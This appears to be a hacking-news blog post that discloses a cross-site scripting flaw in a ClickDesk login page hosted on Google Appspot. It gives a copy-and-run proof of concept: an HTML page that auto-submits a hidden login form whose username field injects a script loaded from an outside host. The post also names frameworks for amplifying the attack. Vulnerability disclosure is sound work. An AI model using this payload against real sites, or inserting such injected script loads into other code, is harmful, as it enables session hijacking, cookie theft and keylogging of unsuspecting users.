Cross Site Scripting Vulnerability at Google Appspot
The Google Appspot "ClickDesk" login page is vulnerable to Cross Site Scripting attack. Cross Site scripting attack is a critical issue in web application. When an attacker gets a user's browser to execute his/her XSS code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read (keylogging), modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting.
The vulnerability can easily be amplified by publicly available tools like Cross Site Scripting framework (XSSF), Cross Site Scripting harvest perl (XSS-Harvest) and so on.
Proof of concept:
The following proof-of concept sample will do a HTTP POST to trigger the XSS vulnerability from "XSS cheatsheet from ha.ckers.org" site. In real hacking situation, the injection source url will be hosted on some compromised web servers.
Copy the following code and save it as any .htm or html filename. Open it any browser to trigger it automatically.
*********
<script>
document.body.innerHTML += '<form id="a" action="https://contactuswidget.appspot.com/login.jsp?domain=lc" method="post">
<input type="hidden" name="command" value="login"><input type="hidden" id="username" name="username" value="<script src=http:\/\/ha.ckers.org\/xss.jpg><\/script>"><input type="hidden" id="password" name="password" value="aaaa"></form>
';
document.getElementById("a").submit();
</script>
The content on Hacking Beast like Hacking Articles, Cyber News etc are provided by many sources ( email,messages,internet etc) , we do not take any responsibility of your activities. The news provided by us on this site is gathered from various sources. if any person have some FAQ's in their mind they can Contact Us. and you can also read our Disclamier for more info. Thank You !
If you enjoyed Hacking Beast Articles , Make sure you subscribe to our RSS feed. Stay Updated about latest Hacking News, Tips and Tricks,and Cyber News.! and recieve all our emails and latest posts directly in your inbox to enjoy fast and easy reading . Thank You!